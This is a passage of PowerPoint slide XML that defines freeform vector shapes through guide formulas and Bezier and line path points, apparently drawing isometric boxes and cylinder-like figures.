                <a:xfrm>
                  <a:off x="4151" y="2720"/>
                  <a:ext cx="338" cy="130"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1736"/>
                    <a:gd name="T1" fmla="*/ 0 h 666"/>
                    <a:gd name="T2" fmla="*/ 0 w 1736"/>
                    <a:gd name="T3" fmla="*/ 199 h 666"/>
                    <a:gd name="T4" fmla="*/ 1736 w 1736"/>
                    <a:gd name="T5" fmla="*/ 666 h 666"/>
                    <a:gd name="T6" fmla="*/ 1736 w 1736"/>
                    <a:gd name="T7" fmla="*/ 468 h 666"/>
                    <a:gd name="T8" fmla="*/ 0 w 1736"/>
                    <a:gd name="T9" fmla="*/ 0 h 66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36"/>
                    <a:gd name="T16" fmla="*/ 0 h 666"/>
                    <a:gd name="T17" fmla="*/ 1736 w 1736"/>
                    <a:gd name="T18" fmla="*/ 666 h 66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36" h="666">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1736" y="666"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1736" y="4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15" name="Freeform 14776"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4151" y="2673"/>
                  <a:ext cx="512" cy="138"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1736 w 2632"/>
                    <a:gd name="T1" fmla="*/ 227 h 709"/>
                    <a:gd name="T2" fmla="*/ 895 w 2632"/>
                    <a:gd name="T3" fmla="*/ 0 h 709"/>
                    <a:gd name="T4" fmla="*/ 0 w 2632"/>
                    <a:gd name="T5" fmla="*/ 241 h 709"/>
                    <a:gd name="T6" fmla="*/ 841 w 2632"/>
                    <a:gd name="T7" fmla="*/ 468 h 709"/>
                    <a:gd name="T8" fmla="*/ 841 w 2632"/>
                    <a:gd name="T9" fmla="*/ 468 h 709"/>
                    <a:gd name="T10" fmla="*/ 1736 w 2632"/>
                    <a:gd name="T11" fmla="*/ 709 h 709"/>
                    <a:gd name="T12" fmla="*/ 2632 w 2632"/>
                    <a:gd name="T13" fmla="*/ 468 h 709"/>
                    <a:gd name="T14" fmla="*/ 1736 w 2632"/>
                    <a:gd name="T15" fmla="*/ 227 h 70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632"/>
                    <a:gd name="T25" fmla="*/ 0 h 709"/>
                    <a:gd name="T26" fmla="*/ 2632 w 2632"/>
                    <a:gd name="T27" fmla="*/ 709 h 70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632" h="709">
                      <a:moveTo>
                        <a:pt x="1736" y="227"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="895" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="841" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1736" y="709"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2632" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1736" y="22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16" name="Freeform 14777"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4489" y="2764"/>
                  <a:ext cx="174" cy="86"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 896"/>
                    <a:gd name="T1" fmla="*/ 439 h 439"/>
                    <a:gd name="T2" fmla="*/ 896 w 896"/>
                    <a:gd name="T3" fmla="*/ 199 h 439"/>
                    <a:gd name="T4" fmla="*/ 896 w 896"/>
                    <a:gd name="T5" fmla="*/ 0 h 439"/>
                    <a:gd name="T6" fmla="*/ 0 w 896"/>
                    <a:gd name="T7" fmla="*/ 241 h 439"/>
                    <a:gd name="T8" fmla="*/ 0 w 896"/>
                    <a:gd name="T9" fmla="*/ 439 h 4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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 439"/>
                    <a:gd name="T17" fmla="*/ 896 w 896"/>
                    <a:gd name="T18" fmla="*/ 439 h 4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6" h="439">
                      <a:moveTo>
                        <a:pt x="0" y="439"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="896" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="896" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="43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17" name="Freeform 14778"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4131" y="2707"/>
                  <a:ext cx="139" cy="153"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 242 w 303"/>
                    <a:gd name="T1" fmla="*/ 96 h 332"/>
                    <a:gd name="T2" fmla="*/ 66 w 303"/>
                    <a:gd name="T3" fmla="*/ 21 h 332"/>
                    <a:gd name="T4" fmla="*/ 66 w 303"/>
                    <a:gd name="T5" fmla="*/ 21 h 332"/>
                    <a:gd name="T6" fmla="*/ 17 w 303"/>
                    <a:gd name="T7" fmla="*/ 33 h 332"/>
                    <a:gd name="T8" fmla="*/ 27 w 303"/>
                    <a:gd name="T9" fmla="*/ 55 h 332"/>
                    <a:gd name="T10" fmla="*/ 58 w 303"/>
                    <a:gd name="T11" fmla="*/ 236 h 332"/>
                    <a:gd name="T12" fmla="*/ 143 w 303"/>
                    <a:gd name="T13" fmla="*/ 305 h 332"/>
                    <a:gd name="T14" fmla="*/ 156 w 303"/>
                    <a:gd name="T15" fmla="*/ 332 h 332"/>
                    <a:gd name="T16" fmla="*/ 221 w 303"/>
                    <a:gd name="T17" fmla="*/ 315 h 332"/>
                    <a:gd name="T18" fmla="*/ 221 w 303"/>
                    <a:gd name="T19" fmla="*/ 315 h 332"/>
                    <a:gd name="T20" fmla="*/ 252 w 303"/>
                    <a:gd name="T21" fmla="*/ 301 h 332"/>
                    <a:gd name="T22" fmla="*/ 242 w 303"/>
                    <a:gd name="T23" fmla="*/ 96 h 33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03"/>
                    <a:gd name="T37" fmla="*/ 0 h 332"/>
                    <a:gd name="T38" fmla="*/ 303 w 303"/>
                    <a:gd name="T39" fmla="*/ 332 h 332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03" h="332">
                      <a:moveTo>
                        <a:pt x="242" y="96"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="30"/>
                        <a:pt x="118" y="0"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="100"/>
                        <a:pt x="11" y="174"/>
                        <a:pt x="58" y="236"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="268"/>
                        <a:pt x="113" y="291"/>
                        <a:pt x="143" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332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32" y="312"/>
                        <a:pt x="243" y="308"/>
                        <a:pt x="252" y="301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="303" y="262"/>
                        <a:pt x="298" y="171"/>
                        <a:pt x="242" y="96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18" name="Freeform 14779"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4100" y="2712"/>
                  <a:ext cx="140" cy="159"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 256 w 306"/>
                    <a:gd name="T1" fmla="*/ 308 h 346"/>
                    <a:gd name="T2" fmla="*/ 62 w 306"/>
                    <a:gd name="T3" fmla="*/ 243 h 346"/>
                    <a:gd name="T4" fmla="*/ 51 w 306"/>
                    <a:gd name="T5" fmla="*/ 38 h 346"/>
                    <a:gd name="T6" fmla="*/ 245 w 306"/>
                    <a:gd name="T7" fmla="*/ 103 h 346"/>
                    <a:gd name="T8" fmla="*/ 256 w 306"/>
                    <a:gd name="T9" fmla="*/ 308 h 34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346"/>
                    <a:gd name="T17" fmla="*/ 306 w 306"/>
                    <a:gd name="T18" fmla="*/ 346 h 34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346">
                      <a:moveTo>
                        <a:pt x="256" y="308"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="346"/>
                        <a:pt x="118" y="317"/>
                        <a:pt x="62" y="243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="168"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="51" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="0"/>
                        <a:pt x="188" y="29"/>
                        <a:pt x="245" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="178"/>
                        <a:pt x="306" y="269"/>
                        <a:pt x="256" y="30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19" name="Freeform 14780"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4127" y="2743"/>
                  <a:ext cx="86" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 156 w 186"/>
                    <a:gd name="T1" fmla="*/ 187 h 210"/>
                    <a:gd name="T2" fmla="*/ 38 w 186"/>
                    <a:gd name="T3" fmla="*/ 147 h 210"/>
                    <a:gd name="T4" fmla="*/ 31 w 186"/>
                    <a:gd name="T5" fmla="*/ 23 h 210"/>
                    <a:gd name="T6" fmla="*/ 149 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 210"/>
                    <a:gd name="T8" fmla="*/ 156 w 186"/>
                    <a:gd name="T9" fmla="*/ 187 h 2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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 210"/>
                    <a:gd name="T17" fmla="*/ 186 w 186"/>
                    <a:gd name="T18" fmla="*/ 210 h 21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6" h="210">
                      <a:moveTo>
                        <a:pt x="156" y="187"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="125" y="210"/>
                        <a:pt x="72" y="193"/>
                        <a:pt x="38" y="147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="102"/>
                        <a:pt x="0" y="46"/>
                        <a:pt x="31" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="0"/>
                        <a:pt x="115" y="17"/>
                        <a:pt x="149" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="108"/>
                        <a:pt x="186" y="164"/>
                        <a:pt x="156" y="18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20" name="Freeform 14781"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4280" y="2746"/>
                  <a:ext cx="139" cy="153"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 242 w 303"/>
                    <a:gd name="T1" fmla="*/ 96 h 332"/>
                    <a:gd name="T2" fmla="*/ 66 w 303"/>
                    <a:gd name="T3" fmla="*/ 20 h 332"/>
                    <a:gd name="T4" fmla="*/ 66 w 303"/>
                    <a:gd name="T5" fmla="*/ 20 h 332"/>
                    <a:gd name="T6" fmla="*/ 17 w 303"/>
                    <a:gd name="T7" fmla="*/ 33 h 332"/>
                    <a:gd name="T8" fmla="*/ 27 w 303"/>
                    <a:gd name="T9" fmla="*/ 55 h 332"/>
                    <a:gd name="T10" fmla="*/ 58 w 303"/>
                    <a:gd name="T11" fmla="*/ 235 h 332"/>
                    <a:gd name="T12" fmla="*/ 143 w 303"/>
                    <a:gd name="T13" fmla="*/ 305 h 332"/>
                    <a:gd name="T14" fmla="*/ 156 w 303"/>
                    <a:gd name="T15" fmla="*/ 332 h 332"/>
                    <a:gd name="T16" fmla="*/ 221 w 303"/>
                    <a:gd name="T17" fmla="*/ 315 h 332"/>
                    <a:gd name="T18" fmla="*/ 221 w 303"/>
                    <a:gd name="T19" fmla="*/ 315 h 332"/>
                    <a:gd name="T20" fmla="*/ 252 w 303"/>
                    <a:gd name="T21" fmla="*/ 300 h 332"/>
                    <a:gd name="T22" fmla="*/ 242 w 303"/>
                    <a:gd name="T23" fmla="*/ 96 h 33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03"/>
                    <a:gd name="T37" fmla="*/ 0 h 332"/>
                    <a:gd name="T38" fmla="*/ 303 w 303"/>
                    <a:gd name="T39" fmla="*/ 332 h 332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03" h="332">
                      <a:moveTo>
                        <a:pt x="242" y="96"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="30"/>
                        <a:pt x="118" y="0"/>
                        <a:pt x="66" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="20"/>
                        <a:pt x="66" y="20"/>
                        <a:pt x="66" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="100"/>
                        <a:pt x="11" y="173"/>
                        <a:pt x="58" y="235"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="267"/>
                        <a:pt x="113" y="291"/>
                        <a:pt x="143" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332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33" y="312"/>
                        <a:pt x="243" y="307"/>
                        <a:pt x="252" y="300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="303" y="262"/>
                        <a:pt x="298" y="170"/>
                        <a:pt x="242" y="96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21" name="Freeform 14782"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4249" y="2751"/>
                  <a:ext cx="141" cy="159"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 256 w 306"/>
                    <a:gd name="T1" fmla="*/ 307 h 346"/>
                    <a:gd name="T2" fmla="*/ 62 w 306"/>
                    <a:gd name="T3" fmla="*/ 242 h 346"/>
                    <a:gd name="T4" fmla="*/ 51 w 306"/>
                    <a:gd name="T5" fmla="*/ 38 h 346"/>
                    <a:gd name="T6" fmla="*/ 245 w 306"/>
                    <a:gd name="T7" fmla="*/ 103 h 346"/>
                    <a:gd name="T8" fmla="*/ 256 w 306"/>
                    <a:gd name="T9" fmla="*/ 307 h 34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346"/>
                    <a:gd name="T17" fmla="*/ 306 w 306"/>
                    <a:gd name="T18" fmla="*/ 346 h 34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346">
                      <a:moveTo>
                        <a:pt x="256" y="307"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="346"/>
                        <a:pt x="118" y="317"/>
                        <a:pt x="62" y="242"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="168"/>
                        <a:pt x="0" y="76"/>
                        <a:pt x="51" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="0"/>
                        <a:pt x="189" y="29"/>
                        <a:pt x="245" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="177"/>
                        <a:pt x="306" y="269"/>
                        <a:pt x="256" y="307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22" name="Freeform 14783"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4277" y="2782"/>
                  <a:ext cx="85" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 156 w 186"/>
                    <a:gd name="T1" fmla="*/ 188 h 211"/>
                    <a:gd name="T2" fmla="*/ 38 w 186"/>
                    <a:gd name="T3" fmla="*/ 148 h 211"/>
                    <a:gd name="T4" fmla="*/ 31 w 186"/>
                    <a:gd name="T5" fmla="*/ 24 h 211"/>
                    <a:gd name="T6" fmla="*/ 149 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 211"/>
                    <a:gd name="T8" fmla="*/ 156 w 186"/>
                    <a:gd name="T9" fmla="*/ 188 h 2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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 211"/>
                    <a:gd name="T17" fmla="*/ 186 w 186"/>
                    <a:gd name="T18" fmla="*/ 211 h 2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6" h="211">
                      <a:moveTo>
                        <a:pt x="156" y="188"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="125" y="211"/>
                        <a:pt x="72" y="193"/>
                        <a:pt x="38" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="103"/>
                        <a:pt x="0" y="47"/>
                        <a:pt x="31" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="0"/>
                        <a:pt x="115" y="18"/>
                        <a:pt x="149" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="109"/>
                        <a:pt x="186" y="164"/>
                        <a:pt x="156" y="18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23" name="Freeform 14784"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4356" y="2768"/>
                  <a:ext cx="95" cy="105"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 184 w 207"/>
                    <a:gd name="T1" fmla="*/ 84 h 227"/>
                    <a:gd name="T2" fmla="*/ 143 w 207"/>
                    <a:gd name="T3" fmla="*/ 38 h 227"/>
                    <a:gd name="T4" fmla="*/ 0 w 207"/>
                    <a:gd name="T5" fmla="*/ 0 h 227"/>
                    <a:gd name="T6" fmla="*/ 42 w 207"/>
                    <a:gd name="T7" fmla="*/ 45 h 227"/>
                    <a:gd name="T8" fmla="*/ 101 w 207"/>
                    <a:gd name="T9" fmla="*/ 227 h 227"/>
                    <a:gd name="T10" fmla="*/ 101 w 207"/>
                    <a:gd name="T11" fmla="*/ 227 h 227"/>
                    <a:gd name="T12" fmla="*/ 185 w 207"/>
                    <a:gd name="T13" fmla="*/ 205 h 227"/>
                    <a:gd name="T14" fmla="*/ 185 w 207"/>
                    <a:gd name="T15" fmla="*/ 205 h 227"/>
                    <a:gd name="T16" fmla="*/ 205 w 207"/>
                    <a:gd name="T17" fmla="*/ 199 h 227"/>
                    <a:gd name="T18" fmla="*/ 184 w 207"/>
                    <a:gd name="T19" fmla="*/ 84 h 2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07"/>
                    <a:gd name="T31" fmla="*/ 0 h 227"/>
                    <a:gd name="T32" fmla="*/ 207 w 207"/>
                    <a:gd name="T33" fmla="*/ 227 h 2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07" h="227">
                      <a:moveTo>
                        <a:pt x="184" y="84"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="174" y="64"/>
                        <a:pt x="167" y="45"/>
                        <a:pt x="143" y="38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" y="13"/>
                        <a:pt x="29" y="28"/>
                        <a:pt x="42" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="105"/>
                        <a:pt x="107" y="172"/>
                        <a:pt x="101" y="227"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="227"/>
                        <a:pt x="101" y="227"/>
                        <a:pt x="101" y="227"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="205"/>
                        <a:pt x="185" y="205"/>
                        <a:pt x="185" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="205"/>
                        <a:pt x="185" y="205"/>
                        <a:pt x="185" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="199"/>
                        <a:pt x="205" y="199"/>
                        <a:pt x="205" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="158"/>
                        <a:pt x="207" y="129"/>
                        <a:pt x="184" y="8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24" name="Freeform 14785"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4859" y="2910"/>
                  <a:ext cx="338" cy="129"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1736"/>
                    <a:gd name="T1" fmla="*/ 0 h 664"/>
                    <a:gd name="T2" fmla="*/ 0 w 1736"/>
                    <a:gd name="T3" fmla="*/ 199 h 664"/>
                    <a:gd name="T4" fmla="*/ 1736 w 1736"/>
                    <a:gd name="T5" fmla="*/ 664 h 664"/>
                    <a:gd name="T6" fmla="*/ 1736 w 1736"/>
                    <a:gd name="T7" fmla="*/ 466 h 664"/>
                    <a:gd name="T8" fmla="*/ 0 w 1736"/>
                    <a:gd name="T9" fmla="*/ 0 h 66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36"/>
                    <a:gd name="T16" fmla="*/ 0 h 664"/>
                    <a:gd name="T17" fmla="*/ 1736 w 1736"/>
                    <a:gd name="T18" fmla="*/ 664 h 66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36" h="664">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1736" y="664"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1736" y="46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25" name="Freeform 14786"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4859" y="2864"/>
                  <a:ext cx="512" cy="137"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1736 w 2633"/>
                    <a:gd name="T1" fmla="*/ 227 h 707"/>
                    <a:gd name="T2" fmla="*/ 895 w 2633"/>
                    <a:gd name="T3" fmla="*/ 0 h 707"/>
                    <a:gd name="T4" fmla="*/ 0 w 2633"/>
                    <a:gd name="T5" fmla="*/ 241 h 707"/>
                    <a:gd name="T6" fmla="*/ 841 w 2633"/>
                    <a:gd name="T7" fmla="*/ 468 h 707"/>
                    <a:gd name="T8" fmla="*/ 841 w 2633"/>
                    <a:gd name="T9" fmla="*/ 468 h 707"/>
                    <a:gd name="T10" fmla="*/ 1736 w 2633"/>
                    <a:gd name="T11" fmla="*/ 707 h 707"/>
                    <a:gd name="T12" fmla="*/ 2633 w 2633"/>
                    <a:gd name="T13" fmla="*/ 468 h 707"/>
                    <a:gd name="T14" fmla="*/ 1736 w 2633"/>
                    <a:gd name="T15" fmla="*/ 227 h 707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633"/>
                    <a:gd name="T25" fmla="*/ 0 h 707"/>
                    <a:gd name="T26" fmla="*/ 2633 w 2633"/>
                    <a:gd name="T27" fmla="*/ 707 h 707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633" h="707">
                      <a:moveTo>
                        <a:pt x="1736" y="227"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="895" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="841" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1736" y="707"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2633" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1736" y="22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26" name="Freeform 14787"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4839" y="2898"/>
                  <a:ext cx="138" cy="153"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 241 w 302"/>
                    <a:gd name="T1" fmla="*/ 96 h 333"/>
                    <a:gd name="T2" fmla="*/ 66 w 302"/>
                    <a:gd name="T3" fmla="*/ 21 h 333"/>
                    <a:gd name="T4" fmla="*/ 66 w 302"/>
                    <a:gd name="T5" fmla="*/ 21 h 333"/>
                    <a:gd name="T6" fmla="*/ 17 w 302"/>
                    <a:gd name="T7" fmla="*/ 34 h 333"/>
                    <a:gd name="T8" fmla="*/ 27 w 302"/>
                    <a:gd name="T9" fmla="*/ 55 h 333"/>
                    <a:gd name="T10" fmla="*/ 58 w 302"/>
                    <a:gd name="T11" fmla="*/ 236 h 333"/>
                    <a:gd name="T12" fmla="*/ 143 w 302"/>
                    <a:gd name="T13" fmla="*/ 305 h 333"/>
                    <a:gd name="T14" fmla="*/ 156 w 302"/>
                    <a:gd name="T15" fmla="*/ 333 h 333"/>
                    <a:gd name="T16" fmla="*/ 221 w 302"/>
                    <a:gd name="T17" fmla="*/ 315 h 333"/>
                    <a:gd name="T18" fmla="*/ 221 w 302"/>
                    <a:gd name="T19" fmla="*/ 315 h 333"/>
                    <a:gd name="T20" fmla="*/ 252 w 302"/>
                    <a:gd name="T21" fmla="*/ 301 h 333"/>
                    <a:gd name="T22" fmla="*/ 241 w 302"/>
                    <a:gd name="T23" fmla="*/ 96 h 333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02"/>
                    <a:gd name="T37" fmla="*/ 0 h 333"/>
                    <a:gd name="T38" fmla="*/ 302 w 302"/>
                    <a:gd name="T39" fmla="*/ 333 h 333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02" h="333">
                      <a:moveTo>
                        <a:pt x="241" y="96"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="30"/>
                        <a:pt x="117" y="0"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="34"/>
                        <a:pt x="17" y="34"/>
                        <a:pt x="17" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="100"/>
                        <a:pt x="11" y="174"/>
                        <a:pt x="58" y="236"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="268"/>
                        <a:pt x="112" y="291"/>
                        <a:pt x="143" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="333"/>
                        <a:pt x="156" y="333"/>
                        <a:pt x="156" y="333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32" y="312"/>
                        <a:pt x="243" y="308"/>
                        <a:pt x="252" y="301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="262"/>
                        <a:pt x="298" y="171"/>
                        <a:pt x="241" y="96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27" name="Freeform 14788"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4808" y="2903"/>
                  <a:ext cx="140" cy="159"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 306"/>
                    <a:gd name="T1" fmla="*/ 308 h 346"/>
                    <a:gd name="T2" fmla="*/ 61 w 306"/>
                    <a:gd name="T3" fmla="*/ 243 h 346"/>
                    <a:gd name="T4" fmla="*/ 51 w 306"/>
                    <a:gd name="T5" fmla="*/ 38 h 346"/>
                    <a:gd name="T6" fmla="*/ 245 w 306"/>
                    <a:gd name="T7" fmla="*/ 103 h 346"/>
                    <a:gd name="T8" fmla="*/ 255 w 306"/>
                    <a:gd name="T9" fmla="*/ 308 h 34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346"/>
                    <a:gd name="T17" fmla="*/ 306 w 306"/>
                    <a:gd name="T18" fmla="*/ 346 h 34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346">
                      <a:moveTo>
                        <a:pt x="255" y="308"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="346"/>
                        <a:pt x="118" y="317"/>
                        <a:pt x="61" y="243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
